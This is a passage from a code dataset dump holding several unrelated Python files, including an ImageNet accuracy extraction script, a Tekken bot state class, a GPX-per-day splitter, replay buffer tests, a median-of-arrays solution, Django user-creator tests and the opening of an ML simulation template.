results = training_runners['sess'].run( [ \n inputs[ 'data_idxs' ], model['model'].global_step,\n accuracy_op ] ) \n gs = results[1] \n data_idx = results[0]\n accuracy = results[2]\n filenames.extend(data_idx)\n accuracies.append(accuracy)\n print(\"Step number: {}\".format(gs))\n # print(loss_names_to_vals, data_idx)\n # return\n\n # run the remaining examples\n start = time.perf_counter()\n for step in range( max_steps - 1 ):\n results = training_runners['sess'].run( [\n inputs[ 'data_idxs' ], \n final_output,\n inputs['target_batch'],\n accuracy_op ] ) \n data_idx = results[0]\n accuracy = results[-1]\n logits = results[1]\n gt = results[2]\n sorted_top5 = np.argsort(logits[0])[::-1][:5]\n sorted_gt = np.argsort(gt[0])[::-1][0]\n top5 = 0.\n if sorted_gt in sorted_top5:\n top5 = 1.\n filenames.extend(data_idx)\n accuracies.append(accuracy)\n stats.push(accuracy)\n top5_stats.push(top5)\n if step % print_every == 0 and step > 0: \n print( 'Step {0} of {1}: ({5}: {2:.3f} || Top 5: {3:.3f} :: ({4:.2f} secs/step)'.format( \n step, max_steps - 1,\n stats.mean(), \n top5_stats.mean(),\n # stats.variance(),\n (time.perf_counter() - start) / print_every,\n 'accuracy'\n ))\n start = time.perf_counter()\n\n if training_runners['coord'].should_stop():\n break\n\n os.system(\"sudo touch /home/ubuntu/s3/imagenet_accuracy/{}_{}_{}.txt\".format(\n given_task, int(stats.mean() * 1000) / 10., int(top5_stats.mean() * 1000) / 10.))\n print('The size of losses is %s while we expect it to run for %d steps with batchsize %d' % (len(filenames), inputs['max_steps'], cfg['batch_size']))\n\n end_train_time = time.time() - start_time\n if args.out_name:\n out_name = args.out_name\n else:\n out_name = '{task}_{split}_imagenet_accuracy.pkl'.format(task=given_task, split=args.data_split)\n save_path = os.path.join( save_dir, out_name )\n \n val_accuracy = {}\n with open( save_path, 'wb' ) as f:\n val_accuracy['file_indexes'] = filenames\n val_accuracy['global_step'] = gs\n val_accuracy['accuracy'] = accuracies\n pickle.dump( val_accuracy, f )\n \n if args.out_dir:\n os.makedirs(args.out_dir, exist_ok=True)\n os.system(\"sudo cp {fp} {out}/\".format(fp=save_path, out=args.out_dir))\n else:\n if transfer:\n copy_to = cfg['log_root']\n else:\n copy_to = os.path.join(cfg['log_root'], given_task)\n os.system(\"sudo mv {fp} {dst}/\".format(fp=save_path, dst=copy_to))\n print(\"sudo mv {fp} {dst}/\".format(fp=save_path, dst=copy_to))\n # if transfer:\n # os.makedirs('/home/ubuntu/s3/model_log/losses_transfer/', exist_ok=True)\n # os.system(\"sudo cp {fp} /home/ubuntu/s3/model_log/losses_transfer/\".format(fp=save_path))\n # else:\n # os.makedirs('/home/ubuntu/s3/model_log/losses/', exist_ok=True)\n # os.system(\"sudo cp {fp} /home/ubuntu/s3/model_log/losses/\".format(fp=save_path))\n\n print( 'saved losses to {0}'.format( save_path ))\n print('time to extract %d epochs: %.3f hrs' % (cfg['num_epochs'], end_train_time/(60*60)))\n finally:\n utils.request_data_loading_end( training_runners )\n utils.end_data_loading_and_sess( training_runners )\n\ndef setup_metrics( inputs, model, cfg ):\n # predictions = model[ 'model' ].\n # Choose the metrics to compute:\n # names_to_values, names_to_updates = slim.metrics.aggregate_metric_map( {} )\n return {}, {}\n\n\ndef get_max_steps(original_max_steps, data_split):\n n_images = None\n if data_split == 'train':\n n_images = 129380\n elif data_split == 'val':\n n_images = 50000 \n elif data_split == 'test':\n n_images = 17853\n else: \n raise NotImplementedError('Unknown data split 
{}'.format(data_split))\n if original_max_steps != n_images:\n print(\"Adjusting number of steps from {} -> {}\".format(\n max(original_max_steps, n_images),\n min(original_max_steps, n_images)\n ))\n return min(original_max_steps, n_images)\n\n\nif __name__=='__main__':\n main( '' )\n\n","sub_path":"code/tools/extract_imagenet_accuracy.py","file_name":"extract_imagenet_accuracy.py","file_ext":"py","file_size_in_byte":15056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"91917326","text":"#!/usr/bin/env python3\n\n# Copyright (c) 2019, Alchemy Meister\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice,this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\n\"\"\"\n\"\"\"\n\nfrom constants.battle import BattleSide, CharacterIDs\nfrom constants.input import InputAttack, InputDirection\n\nfrom log import LogUtils\n\n# pylint: disable=unused-wildcard-import,wildcard-import\nfrom MoveInfoEnums import * # NOQA\n\nclass BotSnapshot:\n \"\"\"\n \"\"\"\n\n __logger = None\n\n def __init__(self, data_dict):\n \"\"\"\n \"\"\"\n if not BotSnapshot.__logger:\n BotSnapshot.__logger = LogUtils.initialize_module_logger(__name__)\n\n # self.xyz = (\n # data_dict['PlayerDataAddress.x'], data_dict['PlayerDataAddress.y'],\n # data_dict['PlayerDataAddress.z']\n # )\n self.move_id = data_dict['PlayerDataAddress.move_id']\n self.simple_state = SimpleMoveStates(\n data_dict['PlayerDataAddress.simple_move_state'])\n self.attack_type = AttackType(\n data_dict['PlayerDataAddress.attack_type']\n )\n self.startup = data_dict['PlayerDataAddress.attack_startup']\n self.startup_end = data_dict['PlayerDataAddress.attack_startup_end']\n self.attack_damage = data_dict['PlayerDataAddress.attack_damage']\n self.complex_state = ComplexMoveStates(\n data_dict['PlayerDataAddress.complex_move_state'])\n self.damage_taken = data_dict['PlayerDataAddress.damage_taken']\n self.move_timer = data_dict['PlayerDataAddress.move_timer']\n self.recovery = data_dict['PlayerDataAddress.recovery']\n self.char_id = data_dict['PlayerDataAddress.char_id']\n self.throw_flag = 
data_dict['PlayerDataAddress.throw_flag']\n self.rage_flag = data_dict['PlayerDataAddress.rage_flag']\n self.input_counter = data_dict['PlayerDataAddress.input_counter']\n self.input_direction = InputDirection(\n data_dict['PlayerDataAddress.input_direction']\n )\n try:\n self.input_button = InputAttack(\n data_dict['PlayerDataAddress.input_attack']\n # % InputAttackCodes.xRAGE.value\n )\n except ValueError:\n self.__logger.debug(\n 'unknown input attack: %d',\n data_dict['PlayerDataAddress.input_attack']\n )\n self.input_button = InputAttack.NULL\n self.rage_button_flag = (\n data_dict['PlayerDataAddress.input_attack']\n >= InputAttack.B_RAGE.value\n )\n self.stun_state = StunStates(data_dict['PlayerDataAddress.stun_type'])\n self.is_power_crush = data_dict['PlayerDataAddress.power_crush'] > 0\n\n cancel_window_bitmask = data_dict['PlayerDataAddress.cancel_window']\n recovery_window_bitmask = data_dict['PlayerDataAddress.recovery']\n\n self.is_cancelable = (\n (CancelStatesBitmask.CANCELABLE.value & cancel_window_bitmask)\n == CancelStatesBitmask.CANCELABLE.value\n )\n self.is_bufferable = (\n (CancelStatesBitmask.BUFFERABLE.value & cancel_window_bitmask)\n == CancelStatesBitmask.BUFFERABLE.value\n )\n self.is_parry1 = (\n (CancelStatesBitmask.PARRYABLE_1.value & cancel_window_bitmask)\n == CancelStatesBitmask.PARRYABLE_1.value\n )\n self.is_parry2 = (\n (CancelStatesBitmask.PARRYABLE_2.value & cancel_window_bitmask)\n == CancelStatesBitmask.PARRYABLE_2.value\n )\n self.is_recovering = (\n (ComplexMoveStates.RECOVERING.value & recovery_window_bitmask)\n == ComplexMoveStates.RECOVERING.value\n )\n self.is_starting = self.startup > 0 and self.move_timer <= self.startup\n self.throw_tech = ThrowTechs(data_dict['PlayerDataAddress.throw_tech'])\n\n #self.highest_y = max(data_dict['PlayerDataAddress.y'])\n # self.lowest_y = min(data_dict['PlayerDataAddress.y'])\n\n # self.hitboxes = [\n # data_dict['PlayerDataAddress.hitbox1'],\n # data_dict['PlayerDataAddress.hitbox2'],\n # data_dict['PlayerDataAddress.hitbox3'],\n # data_dict['PlayerDataAddress.hitbox4'],\n # data_dict['PlayerDataAddress.hitbox5']\n # ]\n self.skeleton = (\n data_dict['PlayerDataAddress.x'], data_dict['PlayerDataAddress.y'],\n data_dict['PlayerDataAddress.z']\n )\n\n self.active_xyz = (\n data_dict['PlayerDataAddress.activebox_x'],\n data_dict['PlayerDataAddress.activebox_y'],\n data_dict['PlayerDataAddress.activebox_z']\n )\n\n self.is_jump = (\n data_dict['PlayerDataAddress.jump_flags']\n & JumpFlagBitmask.JUMP.value == JumpFlagBitmask.JUMP.value\n )\n self.hit_outcome = HitOutcome(\n data_dict['PlayerDataAddress.hit_outcome']\n )\n self.mystery_state = data_dict['PlayerDataAddress.mystery_state']\n\n #self.movelist_to_use = data_dict['PlayerDataAddress.movelist_to_use']\n\n self.current_side = BattleSide(\n data_dict['PlayerDataAddress.current_side']\n )\n\n self.wins = data_dict['EndBlockPlayerDataAddress.round_wins']\n self.combo_counter = (\n data_dict['EndBlockPlayerDataAddress.display_combo_counter']\n )\n self.combo_damage = (\n data_dict['EndBlockPlayerDataAddress.display_combo_damage']\n )\n self.juggle_damage = (\n data_dict['EndBlockPlayerDataAddress.display_juggle_damage']\n )\n\n self.use_opponents_movelist = data_dict['use_opponent_movelist']\n self.movelist_parser = data_dict['movelist_parser']\n\n try:\n self.character_name = CharacterIDs(\n data_dict['PlayerDataAddress.char_id']\n ).name\n except KeyError:\n self.character_name = \"UNKNOWN\"\n\n # def print_y_info(self):\n # print('{:.4f}, {:.4f}, 
{:.4f}'.format(\n # self.highest_y, self.lowest_y, self.highest_y - self.lowest_y)\n # )\n\n def is_character_name_loaded(self):\n \"\"\"\n\n \"\"\"\n # pylint: disable=no-member\n return self.character_name != CharacterIDs.NOT_YET_LOADED.name\n\n def get_input_state(self):\n \"\"\"\n\n \"\"\"\n return (\n self.input_direction,\n self.current_side,\n self.input_button,\n self.rage_button_flag\n )\n\n def get_traicking_type(self):\n \"\"\"\n\n \"\"\"\n # if self.complex_state.value < 8:\n return self.complex_state\n # else:\n # return ComplexMoveStates.UNKN\n\n def is_blocking(self):\n \"\"\"\n\n \"\"\"\n return self.complex_state == ComplexMoveStates.BLOCK\n\n def is_getting_counter_hit(self):\n \"\"\"\n\n \"\"\"\n return self.hit_outcome in (\n HitOutcome.COUNTER_HIT_CROUCHING,\n HitOutcome.COUNTER_HIT_STANDING\n )\n\n def is_getting_ground_hit(self):\n \"\"\"\n\n \"\"\"\n return self.hit_outcome in (\n HitOutcome.GROUNDED_FACE_DOWN, HitOutcome.GROUNDED_FACE_UP\n )\n\n def is_getting_wall_splatted(self):\n \"\"\"\n\n \"\"\"\n return self.simple_state in (\n SimpleMoveStates.WALL_SPLAT_18, SimpleMoveStates.WALL_SPLAT_19\n )\n\n def is_getting_hit(self):\n \"\"\"\n\n \"\"\"\n return self.stun_state in (\n StunStates.BEING_PUNISHED, StunStates.GETTING_HIT\n )\n # TODO: make this more accurate\n # return (\n # not self.is_cancelable\n # and self.complex_state == ComplexMoveStates.RECOVERING\n # and self.simple_state == SimpleMoveStates.STANDING_FORWARD\n # and self.attack_damage == 0\n # and self.startup == 0\n # )\n\n def is_hitting(self):\n \"\"\"\n\n \"\"\"\n return self.stun_state == StunStates.DOING_THE_HITTING\n\n def is_punish(self):\n \"\"\"\n\n \"\"\"\n return self.stun_state == StunStates.BEING_PUNISHED\n\n def is_attack_mid(self):\n \"\"\"\n\n \"\"\"\n return self.attack_type == AttackType.MID\n\n def is_attack_unblockable(self):\n \"\"\"\n\n \"\"\"\n return self.attack_type in {\n AttackType.HIGH_UNBLOCKABLE,\n AttackType.LOW_UNBLOCKABLE,\n AttackType.MID_UNBLOCKABLE\n }\n\n def is_attack_antiair(self):\n \"\"\"\n\n \"\"\"\n return self.attack_type == AttackType.ANTIAIR_ONLY\n\n def is_attack_throw(self):\n \"\"\"\n\n \"\"\"\n return self.throw_flag == 1\n\n def is_attack_low(self):\n \"\"\"\n\n \"\"\"\n return self.attack_type == AttackType.LOW\n\n def is_in_throwing(self):\n \"\"\"\n\n \"\"\"\n return self.attack_type == AttackType.THROW\n\n def get_active_frames(self):\n \"\"\"\n\n \"\"\"\n return self.startup_end - self.startup + 1\n\n def is_attack_whiffing(self):\n \"\"\"\n\n \"\"\"\n return self.complex_state in {\n ComplexMoveStates.END1,\n ComplexMoveStates.F_MINUS,\n ComplexMoveStates.RECOVERING,\n ComplexMoveStates.UN17,\n ComplexMoveStates.SS,\n ComplexMoveStates.WALK\n }\n\n def is_on_ground(self):\n \"\"\"\n\n \"\"\"\n return self.simple_state in {\n SimpleMoveStates.GROUND_FACEDOWN,\n SimpleMoveStates.GROUND_FACEUP\n }\n\n def is_being_juggled(self):\n \"\"\"\n\n \"\"\"\n return self.simple_state == SimpleMoveStates.JUGGLED\n\n def is_airborne(self):\n \"\"\"\n\n \"\"\"\n return self.simple_state == SimpleMoveStates.AIRBORNE\n\n def is_holding_up(self):\n \"\"\"\n\n \"\"\"\n return self.input_direction == InputDirection.UP\n\n def is_holding_up_back(self):\n \"\"\"\n\n \"\"\"\n return self.input_direction == InputDirection.UP_BACK\n\n def is_technical_crouch(self):\n \"\"\"\n\n \"\"\"\n return self.simple_state in (\n SimpleMoveStates.CROUCH,\n SimpleMoveStates.CROUCH_BACK,\n SimpleMoveStates.CROUCH_FORWARD\n )\n\n def is_technical_jump(self):\n \"\"\"\n\n \"\"\"\n 
return self.is_jump\n        # return self.simple_state in (\n        #     SimpleMoveStates.AIRBORNE,\n        #     SimpleMoveStates.AIRBORNE_26,\n        #     SimpleMoveStates.AIRBORNE_24\n        # )\n\n    def is_homing1(self):\n        \"\"\"\n\n        \"\"\"\n        return self.complex_state == ComplexMoveStates.S_PLUS\n\n    def is_homing2(self):\n        \"\"\"\n\n        \"\"\"\n        return self.complex_state == ComplexMoveStates.S\n\n    def is_being_knocked_down(self):\n        \"\"\"\n\n        \"\"\"\n        return self.simple_state == SimpleMoveStates.KNOCKDOWN\n\n    def is_while_standing(self):\n        \"\"\"\n\n        \"\"\"\n        return self.simple_state in {\n            SimpleMoveStates.CROUCH, SimpleMoveStates.CROUCH_BACK,\n            SimpleMoveStates.CROUCH_FORWARD\n        }\n\n    def is_wall_splat(self):\n        \"\"\"\n\n        \"\"\"\n        # TODO: use the wall splat states in ComplexMoveStates; move ids may\n        # be different for 'big' characters\n        return (\n            self.move_id == 2396 or self.move_id == 2387\n            or self.move_id == 2380 or self.move_id == 2382\n        )\n\n    def is_in_rage(self):\n        \"\"\"\n\n        \"\"\"\n        return self.rage_flag > 0\n\n    def is_attack_starting(self):\n        \"\"\"\n\n        \"\"\"\n        # return self.complex_state in {\n        #     ComplexMoveStates.ATTACK_STARTING_1,\n        #     ComplexMoveStates.ATTACK_STARTING_2,\n        #     ComplexMoveStates.ATTACK_STARTING_3,\n        #     ComplexMoveStates.ATTACK_STARTING_5,\n        #     ComplexMoveStates.ATTACK_STARTING_6,\n        #     ComplexMoveStates.ATTACK_STARTING_7\n        # } #doesn't work on several of Kazuya's moves, maybe others\n        if self.startup > 0:\n            is_active = self.move_timer <= self.startup\n            return is_active\n        return False\n\n    def get_movelist_to_use(self):\n        \"\"\"\n\n        \"\"\"\n        # note: the matching attribute assignment in __init__ is currently commented out\n        return self.movelist_to_use\n","sub_path":"tekken/bot_snapshot.py","file_name":"bot_snapshot.py","file_ext":"py","file_size_in_byte":13549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"547622900","text":"# vim: expandtab tabstop=4 shiftwidth=4\n\n'''\nI dumped two years of tracklogs off my Garmin eTrex Venture HC\nusing GPSBabel to create a big GPX file. I needed a way to take\nthat big GPX file and break it down into a bunch of daily GPX files,\nso I created this script. 
It's more of a hack than I would like,\nespecially around XML namespaces; ElementTree doesn't eat its own\ndogfood, so parsed input doesn't preserve each attribute's\nnamespace, causing the ElementTree.write() to error out when the\ndefault_namespace is set.\n'''\n\nfrom argparse import ArgumentParser\nfrom datetime import datetime, timedelta\nfrom xml.etree import ElementTree as ET\n\nimport os\nimport sys\n\nnamespaces = { 'gpx': 'http://www.topografix.com/GPX/1/0' }\n\ndef get_date_for_trkseg(trkseg, utc_offset, epoch_offset):\n max_date = datetime(1970, 1, 1)\n utc_offset = timedelta(hours=utc_offset)\n epoch_offset = timedelta(days=1024*7*epoch_offset)\n\n for trkpt in trkseg:\n time_elem = trkpt.find('gpx:time', namespaces)\n date = datetime.strptime(time_elem.text, '%Y-%m-%dT%H:%M:%SZ')\n date += utc_offset + epoch_offset\n\n if date > max_date:\n max_date = date\n\n return max_date\n\ndef apply_epoch_offset(trkseg, epoch_offset):\n for trkpt in trkseg:\n time_elem = trkpt.find('gpx:time', namespaces)\n orig_time = datetime.strptime(time_elem.text, '%Y-%m-%dT%H:%M:%SZ')\n new_time = orig_time + timedelta(days=1024*7*epoch_offset)\n time_elem.text = new_time.strftime('%Y-%m-%dT%H:%M:%SZ')\n\ndef remove_trkseg_namespaces(trkseg):\n trkseg.tag = 'trkseg'\n\n for trkpt in trkseg:\n trkpt.tag = 'trkpt'\n ele = trkpt.find('gpx:ele', namespaces)\n ele.tag = 'ele'\n time = trkpt.find('gpx:time', namespaces)\n time.tag = 'time'\n\nclass Track:\n def __init__(self, date):\n self.date = date\n self.track_segments = []\n\n def __str__(self):\n return 'Track for {0} with {1} segments'.format(self.date, len(self.track_segments))\n\n def add_track_segment(self, ts, epoch_offset):\n apply_epoch_offset(ts, epoch_offset)\n remove_trkseg_namespaces(ts)\n self.track_segments.append(ts)\n\n def xml(self):\n gpx = ET.Element('gpx', attrib={\n 'version': '1.0',\n 'creator': 'https://github.com/gershwinlabs/photography/blob/master/gpx_per_day.py',\n 'xmlns': 'http://www.topografix.com/GPX/1/0',\n 'xmlns:xsi': 'http://www.w3.org/2001/XMLSchema-instance',\n 'xsi:schemaLocation': 'http://www.topografix.com/GPX/1/0 http://www.topografix.com/GPX/1/0/gpx.xsd',\n })\n\n trk = ET.SubElement(gpx, 'trk')\n name = ET.SubElement(trk, 'name')\n name.text = str(self.date)\n\n for track_segment in self.track_segments:\n trk.append(track_segment)\n\n return ET.tostring(gpx, encoding='UTF-8')\n\ndef check_utc_offset(offset):\n if offset < -12 or offset > 12:\n return 0, 'UTC offset too large'\n\n return offset, None\n\ndef setup_argparser():\n parser = ArgumentParser(description='Breaks a single GPX file into separate GPX files for each day.')\n parser.add_argument('--input', required=True, help='Input GPX file')\n parser.add_argument('--prefix', default='', required=False, help='Prefix that will be placed onto the name of each file')\n parser.add_argument('--utc_offset', default=0, type=int, required=False, help=\"UTC offset in hours, in case you're far from the prime meridian\")\n parser.add_argument('--epoch_offset', default=0, type=int, required=False, help='Epoch offset in units of 1024-weeks (10-bits week count from ICD-200)')\n parsed = parser.parse_args()\n return parsed\n\nif __name__ == \"__main__\":\n args = setup_argparser()\n infile_name = args.input\n outfile_prefix = args.prefix.strip()\n utc_offset, err = check_utc_offset(args.utc_offset)\n epoch_offset = args.epoch_offset\n \n if err != None:\n print(err)\n sys.exit(1)\n\n orig_root = ET.parse(infile_name).getroot()\n tracks = {}\n\n for trk in 
orig_root.findall('gpx:trk', namespaces):\n for trkseg in trk.findall('gpx:trkseg', namespaces):\n dt = get_date_for_trkseg(trkseg, utc_offset, epoch_offset)\n\n if dt.date() in tracks:\n tracks[dt.date()].add_track_segment(trkseg, epoch_offset)\n else:\n new_track = Track(dt.date())\n new_track.add_track_segment(trkseg, epoch_offset)\n tracks[dt.date()] = new_track\n\n for date, track in tracks.items():\n dt = datetime(date.year, date.month, date.day)\n\n sep = ''\n\n if len(outfile_prefix) > 0:\n sep = '-'\n\n outfile_name = '{0}{1}{2}.gpx'.format(outfile_prefix, sep, dt.strftime('%Y%m%d'))\n\n if os.path.exists(outfile_name):\n print('{0} already exists. Skipping...'.format(outfile_name))\n continue\n\n print(outfile_name)\n\n with open(outfile_name, 'wb') as f:\n f.write(track.xml())\n","sub_path":"gpx_per_day.py","file_name":"gpx_per_day.py","file_ext":"py","file_size_in_byte":5041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"45337379","text":"def divcheck(num):\n numOfDivs = 0\n for divs in range(1, num + 1):\n if num % divs == 0:\n numOfDivs += 1\n if numOfDivs % 2 != 0:\n numOfDivs = True\n else:\n numOfDivs = False\n return numOfDivs\nopndrs = []\nfor door in range(1, 101):\n numOfDivs = divcheck(door)\n if numOfDivs is True:\n opndrs.append(door)\nprint(\"The following doors are open:\")\nprint(opndrs)\n","sub_path":"100Doors.py","file_name":"100Doors.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"484548572","text":"import unittest\nimport random\nimport torch\nimport numpy as np\nimport torch_testing as tt\nfrom all.environments import State\nfrom all.memory import ExperienceReplayBuffer, PrioritizedReplayBuffer\n\nclass TestExperienceReplayBuffer(unittest.TestCase):\n def setUp(self):\n np.random.seed(1)\n random.seed(1)\n torch.manual_seed(1)\n self.replay_buffer = ExperienceReplayBuffer(5)\n\n def test_run(self):\n states = torch.arange(0, 20)\n actions = torch.arange(0, 20)\n rewards = torch.arange(0, 20)\n expected_samples = torch.tensor([\n [0, 0, 0],\n [1, 1, 0],\n [0, 1, 1],\n [3, 0, 0],\n [1, 4, 4],\n [1, 2, 4],\n [2, 4, 3],\n [4, 7, 4],\n [7, 4, 6],\n [6, 5, 6]\n ])\n expected_weights = np.ones((10, 3))\n actual_samples = []\n actual_weights = []\n for i in range(10):\n state = State(states[i].unsqueeze(0), torch.tensor([1]))\n next_state = State(states[i + 1].unsqueeze(0), torch.tensor([1]))\n self.replay_buffer.store(\n state, actions[i], rewards[i], next_state)\n sample = self.replay_buffer.sample(3)\n actual_samples.append(sample[0].features)\n actual_weights.append(sample[-1])\n tt.assert_equal(torch.cat(actual_samples).view(expected_samples.shape), expected_samples)\n np.testing.assert_array_equal(expected_weights, np.vstack(actual_weights))\n\nclass TestPrioritizedReplayBuffer(unittest.TestCase):\n def setUp(self):\n random.seed(1)\n np.random.seed(1)\n torch.manual_seed(1)\n self.replay_buffer = PrioritizedReplayBuffer(5, 0.6)\n\n def test_run(self):\n states = State(torch.arange(0, 20))\n actions = torch.arange(0, 20)\n rewards = torch.arange(0, 20)\n expected_samples = State(torch.tensor([\n [0, 2, 2],\n [0, 1, 1],\n [3, 3, 5],\n [5, 3, 6],\n [3, 5, 7],\n [8, 5, 8],\n [8, 5, 5],\n ]))\n expected_weights = [[1., 1., 1.],\n [0.56589746, 0.5124394, 0.5124394],\n [0.5124343, 0.5124343, 0.5124343],\n [0.5090894, 0.6456939, 0.46323255],\n [0.51945686, 0.5801515, 0.45691562],\n [0.45691025, 0.5096957, 
0.45691025],\n                            [0.5938914, 0.6220026, 0.6220026]]\n        actual_samples = []\n        actual_weights = []\n        for i in range(10):\n            self.replay_buffer.store(\n                states[i], actions[i], rewards[i], states[i+1])\n            if i > 2:\n                sample = self.replay_buffer.sample(3)\n                sample_states = sample[0].features\n                self.replay_buffer.update_priorities(torch.randn(3))\n                actual_samples.append(sample_states)\n                actual_weights.append(sample[-1])\n\n        actual_samples = State(torch.cat(actual_samples).view((-1, 3)))\n        self.assert_states_equal(actual_samples, expected_samples)\n        np.testing.assert_array_almost_equal(\n            expected_weights, np.vstack(actual_weights)\n        )\n\n    def assert_states_equal(self, actual, expected):\n        tt.assert_almost_equal(actual.raw, expected.raw)\n        tt.assert_equal(actual.mask, expected.mask)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"all/memory/replay_buffer_test.py","file_name":"replay_buffer_test.py","file_ext":"py","file_size_in_byte":3482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"574446563","text":"\"\"\"\n\nGiven two sorted arrays nums1 and nums2 of sizes m and n respectively,\nfind the median of the two sorted arrays. The required time complexity\nis O(log(m + n)).\n\nYou may assume nums1 and nums2 are not both empty.\n\nExample 1:\n\nnums1 = [1, 3]\nnums2 = [2]\n\nThe median is 2.0\nExample 2:\n\nnums1 = [1, 2]\nnums2 = [3, 4]\n\nThe median is (2 + 3)/2 = 2.5\n\"\"\"\n\n\nclass Solution:\n    def findMedianSortedArrays(self, nums1, nums2) -> float:\n        # 1. Determine how many leading elements of the merged array are\n        #    needed so that the median element(s) come last among them.\n        total = len(nums1) + len(nums2)\n        two_mid = total % 2 == 0\n        need = total // 2 + 1\n        # 2. Merge step of merge sort, stopping after `need` elements.\n        #    (Note: this is O(m + n); the docstring asks for O(log(m + n)),\n        #    which would require a binary-search approach instead.)\n        i = 0\n        j = 0\n        c = []\n        while len(c) < need:\n            if j >= len(nums2) or (i < len(nums1) and nums1[i] <= nums2[j]):\n                c.append(nums1[i])\n                i += 1\n            else:\n                c.append(nums2[j])\n                j += 1\n        if two_mid:\n            return float((c[-1] + c[-2]) / 2)\n        else:\n            return float(c[-1])\n\n\nif __name__ == '__main__':\n\n    res = Solution().findMedianSortedArrays([1, 2], [3, 4])\n    # res1 = Solution().findMedianSortedArrays([1, 2], [3])\n    # res2 = Solution().findMedianSortedArrays([1], [1])\n    print(res)\n    # print(res1)\n    # print(res2)\n","sub_path":"4_Median_of_Two_Sorted_Arrays.py","file_name":"4_Median_of_Two_Sorted_Arrays.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"291347652","text":"import pytest\n\nfrom users.creator import UserCreator\n\npytestmark = [pytest.mark.django_db]\n\n\ndef test_existing_user(user):\n    created = UserCreator(name='Камаз Отходов', email='rulon.oboev@gmail.com')()\n\n    created.refresh_from_db()\n\n    assert created == user\n\n\ndef test_two_users_with_same_email(user, mixer):\n    mixer.blend('users.User', email='rulon.oboev@gmail.com')\n    created = UserCreator(name='Камаз Отходов', email='rulon.oboev@gmail.com')()\n\n    created.refresh_from_db()\n\n    assert created == user\n\n\ndef test_two_users_with_same_email_case_is_case_insensitive(user, mixer):\n    mixer.blend('users.User', username='RULON.OBOEV@gmail.com', email='11@gmail.com')\n    created = UserCreator(name='Камаз Отходов', email='rulon.oboev@gmail.com')()\n\n    created.refresh_from_db()\n\n    assert created == user\n\n\ndef test_existing_user_name_does_not_change(user):\n    created = UserCreator(name='Камаз Отходов', email='rulon.oboev@gmail.com')()\n\n    created.refresh_from_db()\n\n    assert created.first_name == 
user.first_name\n assert created.last_name == user.last_name\n assert created.first_name != 'Камаз'\n assert created.last_name != 'Отходов'\n","sub_path":"src/users/tests/user_creator/tests_user_creator_for_existing_users.py","file_name":"tests_user_creator_for_existing_users.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"631171271","text":"# -*- coding: utf-8 -*-\nu\"\"\"ML execution template.\n\n:copyright: Copyright (c) 2020 RadiaSoft LLC. All Rights Reserved.\n:license: http://www.apache.org/licenses/LICENSE-2.0.html\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\nfrom pykern import pkcompat\nfrom pykern import pkio\nfrom pykern import pkjson\nfrom pykern.pkcollections import PKDict\nfrom pykern.pkdebug import pkdp, pkdc, pkdlog\nfrom sirepo import simulation_db\nfrom sirepo.template import template_common\nimport csv\nimport numpy as np\nimport re\nimport sirepo.analysis\nimport sirepo.numpy\nimport sirepo.sim_data\nimport sirepo.util\n\n_SIM_DATA, SIM_TYPE, _SCHEMA = sirepo.sim_data.template_globals()\n\n_SIM_REPORTS = [\n 'analysisReport',\n 'fftReport',\n]\n\n_CLASSIFIER_OUTPUT_FILE = PKDict(\n dtClassifierClassificationFile='dt-classifier-classification.json',\n dtClassifierConfusionFile='dt-classifier-confusion.json',\n knnClassificationFile='classification.json',\n knnConfusionFile='confusion.json',\n knnErrorFile='error.npy',\n linearSvcConfusionFile='linear-svc-confusion.json',\n linearSvcErrorFile='linear-svc-error.npy',\n logisticRegressionClassificationFile='logistic-regression-classification.json',\n logisticRegressionConfusionFile='logistic-regression-confusion.json',\n logisticRegressionErrorFile='logistic-regression-error.npy',\n)\n\n_OUTPUT_FILE = PKDict(\n classificationOutputColEncodingFile='classification-output-col-encoding.json',\n fitCSVFile='fit.csv',\n predictFile='predict.npy',\n scaledFile='scaled.npy',\n testFile='test.npy',\n trainFile='train.npy',\n validateFile='validate.npy',\n **_CLASSIFIER_OUTPUT_FILE\n)\n\n_REPORTS = [\n 'fileColumnReport',\n 'partitionColumnReport',\n 'partitionSelectionReport',\n] + _SIM_REPORTS\n\n\ndef background_percent_complete(report, 